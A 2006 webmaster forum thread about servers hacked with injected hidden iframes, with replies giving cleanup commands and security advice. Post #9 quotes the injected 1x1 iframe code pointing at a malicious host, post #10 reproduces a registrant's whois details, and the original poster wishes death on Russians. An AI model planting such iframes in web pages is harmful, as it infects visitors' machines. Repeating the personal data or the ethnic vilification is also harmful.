fucking russian hackers!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • x3movies
    Registered User
    • Sep 2005
    • 91

    #1

    fucking russian hackers!

    again, for third time this year my server got fucking hacked and they modified all my .html files and added some fucking iframe with applets and shit. all over my dozens of domains. this is so fucking annoying i cannot take this anymore. how the fuck did they get in? if i only could get them fuckers i i cannot even imagine what i would do. i am so pissed now!

    any how, my hosting provider is lookin on how they got in, any ideas on where i should check?

    also is there a way to run a shell command to replace a string in all .html files accross a directory structure? i hate to spend next 20 hours going over all my files.

    any help is appreciated.
    2B || !2B
  • x3movies
    Registered User
    • Sep 2005
    • 91

    #2
    i am loosing traffic by thousands each fucking minute, damn!
    2B || !2B

    Comment

    • jacked
      sperm tail
      • May 2004
      • 11019

      #3
      show the code being added and maybe we can help you a little more
      Got Cam Models?
      icq: 361-607-616

      Comment

      • Jon Clark - BANNED FOR LIFE
        North Coast Pimp
        • Dec 2005
        • 9395

        #4
        First step is not calling them "fucking" anything.....

        It is best to be nice to the Russians, Treat them the same as you would like to be treated....

        Comment

        • NemesiS876
          Confirmed User
          • May 2006
          • 7436

          #5
          Trie to defend whit Kaspersky

          Comment

          • JOHNNY_BUTTHOLES
            Confirmed User
            • Jun 2006
            • 146

            #6
            those cockfaces got me again today too. i had been free of them for a couple months now. i found it on a site i don't check regularly, so i don't know how many of my surfers got infected. fuck

            Comment

            • deniska
              Confirmed User
              • Mar 2001
              • 1053

              #7
              if your with a good managed hosting provider, things like this would not happen.

              Comment

              • rockbear
                Confirmed User
                • Jul 2003
                • 806

                #8
                What is your host?

                Comment

                • x3movies
                  Registered User
                  • Sep 2005
                  • 91

                  #9
                  i host with Webair.com, they were able to remove this IFRAME from all my files, so temporarily i am okay. but i still need to know how they got in so it does not happen again.

                  I dont hate every Russian, but why is like 99.9% of todays worlds hackers are Russians, they fucking suck and should die!

                  any how the code they included is as follows:
                  WARNING: access the page on your own rist it loads some applets and shit:

                  Code:
                  <iframe src='http://dgfjhewfndsbfsdvf.biz/adv/167/new.php' width=1 height=1></iframe><iframe src='http://dgfjhewfndsbfsdvf.biz/adv/new.php?adv=167' width=1 height=1></iframe>
                  2B || !2B

                  Comment

                  • x3movies
                    Registered User
                    • Sep 2005
                    • 91

                    #10
                    Domain Name: DGFJHEWFNDSBFSDVF.BIZ
                    Domain ID: D15515786-BIZ
                    Sponsoring Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
                    Sponsoring Registrar IANA ID: 82
                    Domain Status: clientTransferProhibited
                    Registrant ID: OLNIC34919537
                    Registrant Name: Boriskin Gleb
                    Registrant Organization: Boriskin Gleb
                    Registrant Address1: vesekaya 4-155
                    Registrant City: Novosibirsk
                    Registrant State/Province: Novosibirsk
                    Registrant Postal Code: 109880
                    Registrant Country: Russian Federation
                    Registrant Country Code: RU
                    Registrant Phone Number: +7.3098098911
                    Registrant Facsimile Number: +7.3098098911

                    Name Server: NS3.ASDBIZ.BIZ
                    Name Server: NS4.ASDBIZ.BIZ
                    Created by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
                    Last Updated by Registrar: ONLINENIC, INC. D/B/A CHINA-CHANNEL.COM
                    Domain Registration Date: Tue Dec 05 15:38:47 GMT 2006
                    Domain Expiration Date: Tue Dec 04 23:59:59 GMT 2007
                    Domain Last Updated Date: Thu Dec 07 12:05:47 GMT 2006


                    FUCKING RUSSIAN!
                    2B || !2B

                    Comment

                    • micker
                      Confirmed User
                      • Nov 2005
                      • 748

                      #11
                      ok, if all the files are in the same directory you can just run this...

                      cat * | sed 's/$FIND/$REPLACE/g'

                      change $FIND to what you want to match and $REPLACE with what you want to change it to.

                      Comment

                      • JD
                        Too lazy to set a custom title
                        • Sep 2003
                        • 22651

                        #12
                        :::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc

                        Comment

                        • JOHNNY_BUTTHOLES
                          Confirmed User
                          • Jun 2006
                          • 146

                          #13
                          Originally posted by SPeRMiNaToR
                          :::sigh::: search for "megacount" and you'll see a shitload of threads and about 2 are mine. The ONLY thing that seemed to work was changing every password on the box. That means all scripts/ftp/ssh/etc

                          not just that. you have to make each file 'read only' which is an even bigger pain in the ass

                          Comment

                          • JD
                            Too lazy to set a custom title
                            • Sep 2003
                            • 22651

                            #14
                            Originally posted by JOHNNY_BUTTHOLES
                            not just that. you have to make each file 'read only' which is an even bigger pain in the ass

                            trust me, I tried everything and making them read only didn't do shit.

                            Comment

                            • x3movies
                              Registered User
                              • Sep 2005
                              • 91

                              #15
                              no shit, you guys never found how they got in? amazing....
                              2B || !2B

                              Comment

                              • starpimps
                                Confirmed User
                                • Sep 2006
                                • 6954

                                #16
                                russians are crazy i kno first hand
                                Teen Porn Models / Solo Girls

                                Comment

                                • RawAlex
                                  So Fucking Banned
                                  • Oct 2003
                                  • 9465

                                  #17
                                  x3movies, you might want to closely check your PC and the PC of anyone who has FTP access to your box. You may have a keylogger or similar on your machine sending out stuff.

                                  Also, check every piece of software you are using, from blogs to TGPs and CMS systems... almost every one of them has had some sort of hole in it that can be exploited. Make sure you are up to date, otherwise they will just keep walking in the same hole.

                                  Comment

                                  • Domain Distribution
                                    Ask me about negative cash flow
                                    • May 2006
                                    • 539

                                    #18
                                    russian hackers lol
                                    Artifical Intelligence AIM Bot ~ $199.00
                                    [email protected]
                                    238102273

                                    Comment

                                    • Star 69
                                      Confirmed User
                                      • Nov 2005
                                      • 8602

                                      #19
                                      Don't fuck with russians. Not all the russians are hackers.
                                      e-mail star69

                                      Comment

                                      • Vigilante
                                        Confirmed User
                                        • Nov 2006
                                        • 696

                                        #20
                                        Originally posted by Star 69
                                        Don't fuck with russians. Not all the russians are hackers.

                                        Exactly.. You forgot about drug dealers and simple criminals

                                        As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/

                                        Comment

                                        • drjones
                                          Confirmed User
                                          • Oct 2005
                                          • 908

                                          #21
                                          Originally posted by micker
                                          ok, if all the files are in the same directory you can just run this...

                                          cat * | sed 's/$FIND/$REPLACE/g'

                                          change $FIND to what you want to match and $REPLACE with what you want to change it to.
                                          For a slightly safer version of that command, that will back up your files, and only try to modify .html files, try this.. should run from the document root of your webserver.


                                          perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`

                                          It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.
                                          Last edited by drjones; 12-13-2006, 05:37 AM.
                                          ICQ: 284903372

                                          Comment

                                          • DarkJedi
                                            No Refunds Issued.
                                            • Feb 2001
                                            • 28301

                                            #22
                                            Originally posted by x3movies
                                            i host with Webair.com
                                            hahahahaha


                                            get a real host dude.

                                            Comment

                                            • WDjay
                                              Confirmed User
                                              • Feb 2006
                                              • 381

                                              #23
                                              six figure sys admins are worth thier weight in gold

                                              Comment

                                              • Star 69
                                                Confirmed User
                                                • Nov 2005
                                                • 8602

                                                #24
                                                Originally posted by Vigilante
                                                Exactly.. You forgot about drug dealers and simple criminals

                                                As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/
                                                A lot of smart people live in Russia
                                                e-mail star69

                                                Comment

                                                • VicD
                                                  ICQ: 304-611-162
                                                  • Feb 2005
                                                  • 13245

                                                  #25
                                                  Originally posted by Star 69
                                                  A lot of smart people live in Russia
                                                  Every country has smart and dumb people...

                                                  Comment

                                                  • Denis_SC
                                                    Confirmed User
                                                    • Jan 2004
                                                    • 2332

                                                    #26
                                                    Originally posted by Vigilante
                                                    Exactly.. You forgot about drug dealers and simple criminals

                                                    As hard as it is but sometimes you have to talk to / pay some blackhats to prevent other blackhats from hijacking you :/

                                                    Yeah ...

                                                    Now stfu and pay me for this month

                                                    Denis B.
                                                    ICQ 342-587-607
                                                    denis AT detamed.com

                                                    Comment

                                                    • Wilbo
                                                      Confirmed User
                                                      • Feb 2001
                                                      • 2082

                                                      #27
                                                      I used to get hit with these guys, then I turned off the ftp server and it stopped. So that would lead me to believe it was an ftp hack.

                                                      Comment

                                                      • who
                                                        So Fucking Banned
                                                        • Aug 2003
                                                        • 19593

                                                        #28
                                                        You guys should look into curing SQL injection.

                                                        Comment

                                                        • micker
                                                          Confirmed User
                                                          • Nov 2005
                                                          • 748

                                                          #29
                                                          Originally posted by drjones
                                                          For a slightly safer version of that command, that will back up your files, and only try to modify .html files, try this.. should run from the document root of your webserver.


                                                          perl -pi'.orig' -e 's/$FIND/$REPLACE/g' `find ./ -name "*.html"`

                                                          It will back up the all the original files with a .orig extension as it runs, so if you make a mistake with the regex you can start over. The files with the text substitution will have the original file name.
                                                          I realize now that I had meant for that to be cat *.html and not just the wilcard. It was late when I posted that...

                                                          I like your solution better than mine though.. I need to get more comfortable with perl.

                                                          Comment

                                                          • x3movies
                                                            Registered User
                                                            • Sep 2005
                                                            • 91

                                                            #30
                                                            got hit again. i am loosing it...........
                                                            2B || !2B

                                                            Comment

                                                            • jerzeemedia
                                                              Confirmed User
                                                              • May 2004
                                                              • 1532

                                                              #31
                                                              x3movies,

                                                              Contact me on ICQ, I can more likely than not help. 251095197

                                                              -JM
                                                              Free Adult Blog Hosting
                                                              http://www.waqn.com

                                                              free porn
                                                              www.mojohost.com - Best guys, best host.

                                                              Comment

                                                              • jerzeemedia
                                                                Confirmed User
                                                                • May 2004
                                                                • 1532

                                                                #32
                                                                EDIT: free of charge
                                                                Free Adult Blog Hosting
                                                                http://www.waqn.com

                                                                free porn
                                                                www.mojohost.com - Best guys, best host.

                                                                Comment

                                                                • Nookster
                                                                  Confirmed IT Professional
                                                                  • Nov 2005
                                                                  • 3744

                                                                  #33
                                                                  Ever heard of back-ups?
                                                                  The Best Affiliate Software, Ever.

                                                                  Comment

                                                                  • sam from montreal
                                                                    Confirmed User
                                                                    • Nov 2003
                                                                    • 296

                                                                    #34
                                                                    i got hacked too... an Iframe installing a Trojan horse
                                                                    SEO r0ck st@r

                                                                    Giving tips 107776092 [email protected]

                                                                    Comment

                                                                    • quantum-x
                                                                      Confirmed User
                                                                      • Feb 2002
                                                                      • 6863

                                                                      #35
                                                                      Get yourself a copy of CentOS and Atomic Secured Linux
                                                                      [http://atomicorp.com/amember/signup.php]

                                                                      And kiss all these problems goodbye.
                                                                      PrettyInCash.com - BoozedGFs.com - TeenGFs.com - JizzGFs.com- MilfUploads.com -

                                                                      Comment

                                                                      • porn blogger
                                                                        Confirmed User
                                                                        • Aug 2006
                                                                        • 737

                                                                        #36
                                                                        Originally posted by WDjay
                                                                        six figure sys admins are worth thier weight in gold
                                                                        when is the last time you evaluated a sysadmins weight? most of the ones i know are morbidly obese just as the cliche offers.
                                                                        heeeeyyyyy now!

                                                                        ^ the real biz, yo.

                                                                        Comment

                                                                        • rigrunner
                                                                          Confirmed User
                                                                          • Jan 2004
                                                                          • 877

                                                                          #37
                                                                          i had this a while back host said it was something to do with awstats..
                                                                          Get Nasty - Make Bank Here

                                                                          Comment

                                                                          Working...